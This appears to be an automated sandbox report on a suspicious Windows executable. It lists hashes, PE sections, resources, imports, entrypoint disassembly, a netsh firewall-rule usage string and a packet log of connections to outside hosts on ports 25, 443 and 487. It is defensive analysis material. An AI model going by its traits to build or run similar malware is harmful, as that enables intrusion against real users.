Preview:	..A specified value is not valid.....Usage: add rule name=<string>.. dir=in\|out.. action=allow\|block\|bypass.. [program=<program path>].. [service=<service short name>\|any].. [description=<string>].. [enable=yes\|no (default=yes)].. [profile=public\|private\|domain\|any[,...]].. [localip=any\|<IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [remoteip=any\|localsubnet\|dns\|dhcp\|wins\|defaultgateway\|.. <IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [localport=0-65535\|<port range>[,...]\|RPC\|RPC-EPMap\|IPHTTPS\|any (default=any)].. [remoteport=0-65535\|<port range>[,...]\|any (default=any)].. [protocol=0-255\|icmpv4\|icmpv6\|icmpv4:type,code\|icmpv6:type,code\|.. tcp\|udp\|any (default=any)].. [interfacetype=wireless\|lan\|ras\|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes\|deferapp\|deferuser\|no (default=no)].. [security=authenticate\|authenc\|authdynenc\|authnoencap\|

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.972326317273885
TrID:	Win32 Executable (generic) a (10002005/4) 99.10% InstallShield setup (43055/19) 0.43% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	HsWJJz7nq4.exe
File size:	266752
MD5:	8b7286786c1f017e5002e0ba66bfae58
SHA1:	1b1ab73d9e8bae1f39a897805af00df1d52b3847
SHA256:	b29336af96fb97eae18de7b3655762c9cbcd5c2f0257a43cd4c66cbb864ac79b
SHA512:	4ea39738a1ed69069a72789e806ef9a7783fbee83eb414c1f68abcaec2bb4075774951341f2d82cbec13dcd9d38399a3f5b320c416975e5050d5cefe374ca390
SSDEEP:	3072:sf7ySH25L73lunXwre9EiO5O683Tm7uySP3/sj94daettHY/zHHx4bBvHO6:sf7ySH2VVyXxEYDauBsj9Eae6LWBfO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....2_...

File Icon


Icon Hash:	e5e2fcece7f2f662

Static PE Info

General
Entrypoint:	0x40210e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F328B00 [Tue Aug 11 12:11:44 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5107fa4193c2849c77704d8870503de7

Entrypoint Preview

Instruction
call 00007F1E1CC7BB20h
jmp 00007F1E1CC7767Dh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [0041D0BCh]
push dword ptr [ebp+08h]
call dword ptr [0041D0B8h]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007F1E1CC77806h
test eax, eax
je 00007F1E1CC777E0h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F1E1CC77F3Ah
push dword ptr [ebp+08h]
call 00007F1E1CC77D87h
push dword ptr [00421014h]
call 00007F1E1CC796C5h
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 0041D258h
call dword ptr [0041D0B8h]
test eax, eax
je 00007F1E1CC77817h
push 0041D248h
push eax
call dword ptr [0041D054h]
test eax, eax
je 00007F1E1CC77807h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F1E1CC777CDh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [0041D0C0h]
int3
push 00000008h
call 00007F1E1CC7BC8Ah
pop ecx
ret
push 00000008h
call 00007F1E1CC7BBA7h
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007F1E1CC7780Dh
mov eax, dword ptr [esi]
test eax, eax
je 00007F1E1CC77804h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1fdfc	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d3e000	0x1f6b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1d1e0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1e910	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1e8c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b820	0x1ba00	False	0.785191600679	data	7.53991831646	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1d000	0x36f8	0x3800	False	0.276436941964	data	4.23781388466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21000	0x1d1cfe8	0x2400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1d3e000	0x1f6b8	0x1f800	False	0.65869140625	data	6.59777881705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
JOCO	0x1d57b18	0x636	ASCII text, with very long lines, with no line terminators	Slovenian	Slovenia
NIXEFAMAMUSICETANEKOXOLUFUWA	0x1d58150	0x21af	ASCII text, with very long lines, with no line terminators	Slovenian	Slovenia
TORIVIWEBABAG	0x1d57490	0x685	ASCII text, with very long lines, with no line terminators	Slovenian	Slovenia
RT_CURSOR	0x1d5a338	0x130	data
RT_CURSOR	0x1d5a480	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_CURSOR	0x1d5b328	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_CURSOR	0x1d5bbf8	0x130	data
RT_CURSOR	0x1d5bd28	0xb0	GLS_BINARY_LSB_FIRST
RT_ICON	0x1d3eaf0	0xea8	data	Slovenian	Slovenia
RT_ICON	0x1d3f998	0x8a8	data	Slovenian	Slovenia
RT_ICON	0x1d40240	0x568	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d407a8	0x25a8	dBase III DBT, version number 0, next free block index 40	Slovenian	Slovenia
RT_ICON	0x1d42d50	0x10a8	data	Slovenian	Slovenia
RT_ICON	0x1d43df8	0x468	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d442c0	0xea8	data	Slovenian	Slovenia
RT_ICON	0x1d45168	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 12025942, next used block 12157022	Slovenian	Slovenia
RT_ICON	0x1d45a10	0x568	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d45f78	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 417914817, next used block 401007535	Slovenian	Slovenia
RT_ICON	0x1d48520	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 362303285, next used block 11745314	Slovenian	Slovenia
RT_ICON	0x1d495c8	0x988	data	Slovenian	Slovenia
RT_ICON	0x1d49f50	0x468	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d4a420	0xea8	data	Slovenian	Slovenia
RT_ICON	0x1d4b2c8	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 13223897, next used block 330241	Slovenian	Slovenia
RT_ICON	0x1d4bb70	0x6c8	data	Slovenian	Slovenia
RT_ICON	0x1d4c238	0x568	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d4c7a0	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	Slovenian	Slovenia
RT_ICON	0x1d4ed48	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 518304219, next used block 586000339	Slovenian	Slovenia
RT_ICON	0x1d4fdf0	0x988	data	Slovenian	Slovenia
RT_ICON	0x1d50778	0x468	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d50c58	0xea8	data	Slovenian	Slovenia
RT_ICON	0x1d51b00	0x8a8	data	Slovenian	Slovenia
RT_ICON	0x1d523a8	0x6c8	data	Slovenian	Slovenia
RT_ICON	0x1d52a70	0x568	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_ICON	0x1d52fd8	0x25a8	data	Slovenian	Slovenia
RT_ICON	0x1d55580	0x10a8	data	Slovenian	Slovenia
RT_ICON	0x1d56628	0x988	data	Slovenian	Slovenia
RT_ICON	0x1d56fb0	0x468	GLS_BINARY_LSB_FIRST	Slovenian	Slovenia
RT_STRING	0x1d5bfb8	0x3ac	data	Slovenian	Slovenia
RT_STRING	0x1d5c368	0x2aa	data	Slovenian	Slovenia
RT_STRING	0x1d5c618	0x658	data	Slovenian	Slovenia
RT_STRING	0x1d5cc70	0x53e	data	Slovenian	Slovenia
RT_STRING	0x1d5d1b0	0x502	data	Slovenian	Slovenia
RT_ACCELERATOR	0x1d5a300	0x38	data	Slovenian	Slovenia
RT_GROUP_CURSOR	0x1d5a468	0x14	data
RT_GROUP_CURSOR	0x1d5bbd0	0x22	data
RT_GROUP_CURSOR	0x1d5bdd8	0x22	data
RT_GROUP_ICON	0x1d50be0	0x76	data	Slovenian	Slovenia
RT_GROUP_ICON	0x1d57418	0x76	data	Slovenian	Slovenia
RT_GROUP_ICON	0x1d44260	0x5a	data	Slovenian	Slovenia
RT_GROUP_ICON	0x1d4a3b8	0x68	data	Slovenian	Slovenia
RT_VERSION	0x1d5be00	0x1b4	data

Imports

DLL

Import

KERNEL32.dll

UnregisterWait, UnmapViewOfFile, lstrcpynA, GetDefaultCommConfigW, ReadConsoleA, InterlockedDecrement, GetEnvironmentStringsW, GetUserDefaultLCID, SetVolumeMountPointW, GetSystemDefaultLCID, GetEnvironmentStrings, InitializeCriticalSectionAndSpinCount, GetSystemWindowsDirectoryA, LeaveCriticalSection, GetAtomNameW, ReadFile, PulseEvent, SetConsoleTitleA, LCMapStringA, VerifyVersionInfoW, GetLongPathNameW, GetProcAddress, PeekConsoleInputW, GetComputerNameExW, VerLanguageNameA, CopyFileA, GetLocalTime, WriteConsoleA, LocalAlloc, CreateTapePartition, SetConsoleOutputCP, Module32FirstW, SetEnvironmentVariableA, GetModuleFileNameA, GetModuleHandleA, ReadConsoleInputW, GetCurrentProcessId, AddConsoleAliasA, EnumCalendarInfoExA, FindNextVolumeA, GetACP, GetCommandLineW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCommandLineA, GetStartupInfoA, GetModuleHandleW, Sleep, ExitProcess, GetLastError, WriteFile, GetStdHandle, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, EnterCriticalSection, HeapSize, SetHandleCount, GetFileType, DeleteCriticalSection, SetFilePointer, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LoadLibraryA, GetConsoleCP, GetConsoleMode, GetCPInfo, GetOEMCP, IsValidCodePage, RaiseException, MultiByteToWideChar, RtlUnwind, HeapAlloc, HeapReAlloc, VirtualAlloc, SetStdHandle, FlushFileBuffers, GetLocaleInfoA, GetConsoleOutputCP, WriteConsoleW, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle

Version Infos

Description	Data
InternalName	sahzmoamoru.apa
ProductVersion	7.19.29.18
Copyright	Copyrighz (C) 2021, fudkagata
Translation	0x0129 0x009f

Possible Origin

Language of compilation system	Country where language is spoken	Map
Slovenian	Slovenia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2021 15:50:06.633990049 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:06.733076096 CEST	25	49721	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:06.733263016 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:06.737196922 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:06.836056948 CEST	25	49721	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:06.836220980 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:06.837373018 CEST	25	49721	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:06.837492943 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:06.837747097 CEST	25	49721	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:06.837852955 CEST	49721	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:09.387295961 CEST	49722	443	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.460530996 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.460654020 CEST	49722	443	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.551026106 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.551405907 CEST	49722	443	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.624576092 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.641717911 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.658433914 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.658618927 CEST	49722	443	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.658718109 CEST	49722	443	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.731832981 CEST	443	49722	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.772855997 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.842581034 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:09.843307018 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:09.964052916 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.021681070 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.154376984 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.223903894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.241081953 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.241616964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.241668940 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.312195063 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.355110884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.396825075 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.466265917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.466552019 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.466605902 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.466613054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.536423922 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.575898886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.599960089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600029945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600068092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600104094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600141048 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600188971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600224972 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600260973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600291967 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.600300074 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.600330114 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.600337029 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.600378036 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.600728035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.603380919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.670893908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.670954943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.670994043 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671031952 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671071053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671144009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671159983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671212912 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671217918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671220064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671262026 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671298981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671345949 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671361923 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671387911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671402931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671426058 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671464920 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671502113 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671514988 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671538115 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671557903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671576023 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671613932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671662092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.671668053 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.671720982 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.674540043 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.674587965 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.674776077 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743103981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743199110 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743240118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743288040 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743329048 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743334055 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743366003 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743372917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743412018 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743426085 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743449926 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743488073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743525028 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743514061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743561983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743608952 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743612051 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743650913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743679047 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743690968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743721962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743736029 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743758917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743805885 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743804932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743846893 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743884087 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743894100 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743921995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743961096 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.743968010 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.743997097 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744035006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744054079 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744071960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744117975 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744118929 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744162083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744198084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744210005 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744236946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744273901 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744281054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744309902 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744348049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744350910 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744385004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744427919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744431973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744473934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744512081 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744524956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.744551897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.744596958 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.745414972 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.745465040 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.745506048 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.745533943 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.745543003 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.745585918 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.815891027 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.815959930 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.815999031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816036940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816067934 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816073895 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816099882 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816131115 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816174030 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816179991 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816211939 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816252947 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816252947 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816292048 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816328049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816329956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816366911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816404104 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816406965 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816451073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816493034 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816508055 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816530943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816569090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816572905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816606045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816643000 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816653013 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816682100 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816720009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816725969 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816767931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816808939 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816811085 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816848040 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816884995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816885948 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816922903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816958904 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.816967010 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.816996098 CEST	487	49723	193.56.146.188	192.168.2.4
